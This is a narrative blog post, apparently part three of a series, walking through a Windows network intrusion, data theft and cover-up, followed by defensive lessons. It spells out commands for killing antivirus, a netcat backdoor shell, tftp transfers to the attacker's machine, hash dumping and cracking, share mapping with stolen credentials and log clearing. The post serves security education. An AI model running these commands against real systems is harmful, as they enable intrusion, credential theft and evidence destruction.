Once again, this is just my little story about how some data may be stolen from a network following a penetration. This post is supposed to be educational and should demonstrate that these types on attacks are not rocket science that can be pulled of by an elite few. This post isn't really Kung Fu, I'll leave that to the brilliant Mr Skoudis. This is just a few DOS commands that show that you can get what you want without having to get a VNC of RDP session.
If you missed the intro, part one or part two you can get them here, here and here. These parts along with this one put together the story of my little hack. I hope you enjoy.
Kung Fu Shopping
Right, so I got on the LAN and I’ve had a little look around. Obviously I’m a lazy git so I’ll go for what I think will be the low hanging fruit, the Test Server. Names can give away so much. Often these are the servers that are just thrown onto a network and are maybe excluded from policies, they are not business critical and only used for testing so they are not patched because after all who’s gonna hack a test box eh? Well I am because that’s the type of box I like.
First I’m going to get a shell on the box with my trusty Metasploit. I saw from my scans that this is a Windows 2003 box with no service pack. I’ll therefore use the most reliable exploit I have MS06-040 (thank you Microsoft). There are newer exploits that could be used but this is a reliable favourite.
After gaining root (okay System) on the box I like to carefully and quietly look around to get a feel for where I am.
First things first, I want to stop any AV that might be running. So i'll just have a quick look for it.
Net Start
I hoped to see a service running, but nothing. Hmmm.. lets look at the tasks.
Tasklist
Oh, there it is. AVScanner.exe, never heard of that one before. I’ll kill it just to be sure. I don’t want anything messing with any tools I need to upload.
Taskkill /PID 1548
Before I continue it’s handy to get myself a backdoor just encase I drop the Metasploit session. I’ll use Netcat for this. I copy it up to the temp folder, then start a listener on another port.
tftp –i 192.168.1.113 get nc.exe
nc –L –e cmd.exe –p 33333
Okay, now I connect to my backdoor.
nc 192.168.1.51 33333
Cool. Now I want to get myself another session on the go and get the fantastic Meterpreter going.
Right, I want to dump out anything that needs cracking first so it can be cracked whilst I poke about. Meterpreter lets dump the local hashes.
hashdump
Now that’s all well and good, these are nice to have but I really need so domain credentials. For this I’ll use Cachedump.
cachedump.exe 
Ohh, nice. I got me 2 domain user hashes. No admin but that’s okay. I’ll throw these through John with a good wordlist and carry on.
john --wordlist=pwlist.lst --format=mscash cc.txt
One thing I realise is that these are going to be cracked and come back in uppercase so ideally I want to know the password policy so I don’t start locking people out.
Net accounts
There we go, nice relaxed password policies. No biscuit for Bad Admin!
Right, lets get a bit of info on the host and the network. As I go through these commands I like to pipe them out to a file and then periodically copy the file over to my box. This way I have a load more valuable information if I need to re-enter the network at a later time. I still have my nmap scans from earlier, I'll only get rid of stuff after I have what I came for.
So I get the useful network stuff:
Ipconfig /all
arp -a
Ipconfig /displaydns
This gives me the IP info and lets me know who this box has been talking to recently.
I also want to know what about the other hosts on the domain.
Net view
Right, so there’s the file server. I guess the stuff I want is going to be on there. Hang on, lets not be too hasty. I need to have a look around here first. What else have I got on this box? I'll just rip through the directories with tree then TFTP the file upto my box for easier analysis.
tree c:\ /f /a >filelist.txt
tftp 192.168.1.113 put filelist.txt
Look at that, a backup database file. I’ll have that. I just love the way that people make copies of data and protect those copies so much less than they do the originals.
And some very useful SysInternal tools. Good Admin, you can have that biscuit after all.
So are there any other databases I’ve missed? After all Tree wont pick up hidden files.
Dir /s /h:a *.*
Oh, would you believe it, a hidden password file. It just goes to show what goodies you might find.
type db-pass.txt
Right, lets crack on, the pub opens soon. What am I here for? Accounts database and Customer database. Well they might be in the backup, but I don’t want to take the chance.
Do I have any mapped drives to the server?
Net use
No mapped drives, well lets get one on. First what do I want to map to?
Net view \\File-Server
I can see a data share, I’ll map to that and hopefully be able to grab my data and get out of here.
Net use * \\file-server\data
Tree/f /a
Right, well it seems that the folders are locked down with ACL’s.
John has finished on the wordlist so I’ll see what we have. Well I have one account cracked. Hopefully that’ll do the trick.
Net use * \\File-Server\Data Screwy0u /U:lee
Right I can get into Customer Care and after a second or two I get my customer database.
And it's gone! i should have been a magician!
That’s no good. I’m locked out of Accounts though through even more NTFS permissions. I think I need to kick John up the arse and get these passwords cracked. I throw a bigger dictionary at him and enable the rules.
john --wordlist=bigpwlist.lst --rules --format=mscash cc2.txt
Right, now I got a BackupSVC account. Well if my memory serves me well, my recon found that HackMe was listed as a customer of Backup Service, the outsourcing company. Let’s see what groups this account is in, I guess if they are gonna have a support account it's gonna have some decent privileges right?
Net group “accounts” /domain
Net group “domain admins” /domain
Only Maria is in the accounts group, but I did get an account in Domain Admins. Although I can’t see if Domain Admins is a member of Accounts, if not I can always use PWDump to grab AD and then crack Maria’s password.
Right now I’ll just remap my drive with the good old BackupSVC account, hopefully grab my data and be on my merry way.
So. I have my data. I need to do some tidying up. I’ll overwrite and rename the tools I uploaded before deleting them. I also want to remove any shares I created. I know that I would have left some traces but i'll feel a little better about myself after tidying up. i might also use the Time command to make things slightly more interesting for Mr Admin.
And finally I’ll use the handy tools that I found on the test box to delete the logs on the File Server and the Demo Server.
Psloglist \\file-server –u hackme\BackupSVC –p Support01 –c System Psloglist \\file-server –u hackme\BackupSVC –p Support01 –c Application Psloglist \\file-server –u hackme\BackupSVC –p Support01 –c Security
Right, I’ve got what I wanted, and now I’m outta here.
Lessons
- First lesson, Patch. Patch everything, and once you have finished patching, patch some more.
- Passwords. A good strong password policy that requires passwords to be complex and changed regularly. Also a password audit passwords would have picked up a very weak password on a privileged account such as BackupSVC
- Good account policies should be enforced, locking accounts until they are required.
- Enforce NTFS permissions to lock down access to files, giving access to only those that really need access.
- Good AV software could have prevented some of the tools I uploaded from working, yes I may have been able to modify these tools but it makes the task of the attacker that much harder.
- Check logs regularly and have an incident response plan to deal with a security breach.
Thanks for reading.
